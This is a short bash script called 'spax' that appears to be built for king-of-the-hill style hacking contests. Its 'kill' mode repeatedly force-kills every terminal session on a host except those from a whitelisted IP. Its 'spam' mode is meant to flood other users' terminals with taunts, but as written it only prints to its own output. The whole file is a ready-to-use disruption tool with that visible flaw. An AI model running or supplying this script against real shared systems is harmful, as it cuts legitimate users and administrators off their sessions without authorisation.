#!/bin/bash
# author : wolf/0x776F6C66
# twitter: @0x776F6C66


version=0.1.0
author="@wolf/@0x776F6C66"
ip=$2

function banner() {
    echo -e "\e[31m┌─┐┌─┐┌─┐─┐ ┬\e[0m"
    echo -e "\e[35m└─┐├─┘├─┤┌┴┬┘ \e[33m $version by \e[32m$author \e[0m"
    echo -e "\e[33m└─┘┴  ┴ ┴┴ └─\e[0m"
    echo ""
}

function help_() {
    echo -e "\e[31mOptions : \e[32musage: spax [options] \e[0m"
    echo -e "\e[35m--------\e[0m"
    echo -e "\e[33mspam - \e[32msend spam to terminals that don't originate from a specific ip address\e[0m"
    echo -e "        \e[36mexample: spax spam [ip-to-whitelist] [spam-message] - \e[31mspam-message is optional, if you wish to send one, it must be enclosed within quotes\e[0m"
    echo -e "\n\e[33mkill - \e[32mkill all terminals that don't originate from a specific ip.\e[0m"
    echo -e "        \e[36mexample: spax kill [ip-to-whitelist]\e[0m"
    echo ""
    echo ""
    exit 1
}

function spam() {
    spam_message="\e[33m I can still execute cmd :) Nyancat only messes display not cmd exec ....Follow on twitter:\e[32m @0x776F6C66 \e[0m"
    echo -e "\e[31;35Your TTY: \e[31;33 `tty` \e[0m"
    while :
    do
        for pty in `w -u | grep -vE "($ip)|\:1" | awk '{ print $2 }' | grep -P "pts/\\d+"`
        do
            echo -e "$spam_message"
        done
    done
}

function kill_(){
    if [[ ! $ip =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$  ]]
    then
        echo -e "\e[31m[!] \e[33mInvalid Ip: \e[32m$ip\e[0m"
        exit 1
    fi
    echo -e "\e[31;35Your TTY: \e[31;33 `tty` \e[0m"
    while :
    do
        for pty in `w -u | grep -vE "($ip)|\:1" | awk '{ print $2 }' | grep -P "pts/\\d+"`
        do
            pkill -9 -t $pty && echo -e "\e[33m[*]\e[31m Killed \e[32m $pty \e[0m "
        done
    done
}

banner
case "$1" in
"kill" ) kill_;;
"spam" ) spam;;
* ) help_;;
esac
